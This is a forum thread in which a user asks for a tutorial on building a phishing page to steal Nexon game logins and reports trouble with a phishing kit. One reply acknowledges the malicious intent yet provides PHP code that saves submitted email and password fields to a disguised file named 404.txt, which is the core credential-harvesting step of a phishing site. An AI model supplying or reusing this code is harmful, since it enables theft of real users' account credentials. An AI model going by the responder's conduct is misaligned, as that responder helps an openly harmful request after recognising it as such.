Results 1 to 3 of 3
  1. #1
    darkdrayken's Avatar
    Join Date
    Nov 2009
    Gender
    male
    Location
    Canada
    Posts
    12
    Reputation
    10
    Thanks
    0

    Phishing nexon login page?

    I need a tutorial on how to create a phising website for nexon login. I tried Super Phiser 1.0 and uploaded the php file and html file to a ********* website I made, but when I enter name and pass, nothing happen, and I don't receive the information in my password.txt file in my website.

    So I really need help here, please.

  2. #2
    kolec94's Avatar
    Join Date
    Nov 2010
    Gender
    male
    Location
    Davenport,IA
    Posts
    1,784
    Reputation
    2
    Thanks
    104
    thats seem like alot of work for a phisher

    [IMG]https://i988.photobucke*****m/albums/af4/mallard247/kolec94.png[/IMG]

  3. #3
    Null::Void's Avatar
    Join Date
    Feb 2012
    Gender
    male
    Posts
    47
    Reputation
    6
    Thanks
    7
    My Mood
    Relaxed
    Well since you seem to have maliciouse intent i don't think it would be smart to help you, but since i still like educating people try and take a simple php script that grabs stuff from a text box using $_POST and saving it to a file.

    My Facebook phisher i created for a security lecture (This is only the php handling code and i have stripped it down because you seem to want to steal stuff)
    Code:
    <?php  
    $fp = fopen("404.txt", "w");
    fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
    ?>
    If you can't figure out how this works or links to the HTML page then try some googling please
    Last edited by Null::Void; 03-16-2012 at 11:00 PM. Reason: Forgot to close my php code with ?>

Similar Threads

  1. CF LOGIN PAGE (GUNS)
    By mokkiller2 in forum CrossFire Mods & Rez Modding
    Replies: 57
    Last Post: 07-24-2010, 08:47 PM
  2. [Release] Hamtaro UFB Login Page
    By Shocking in forum Combat Arms Mods & Rez Modding
    Replies: 40
    Last Post: 02-04-2010, 01:36 PM
  3. [RELEASE] UFB Metallica login page
    By No5cope in forum Combat Arms Mods & Rez Modding
    Replies: 17
    Last Post: 01-31-2010, 02:57 AM
  4. [RELEASE] UFB Bleach - Ichigo login page
    By No5cope in forum Combat Arms Mods & Rez Modding
    Replies: 38
    Last Post: 01-27-2010, 02:06 AM
  5. [RELEASE] UFB Login page
    By No5cope in forum Combat Arms Mods & Rez Modding
    Replies: 25
    Last Post: 01-22-2010, 07:46 PM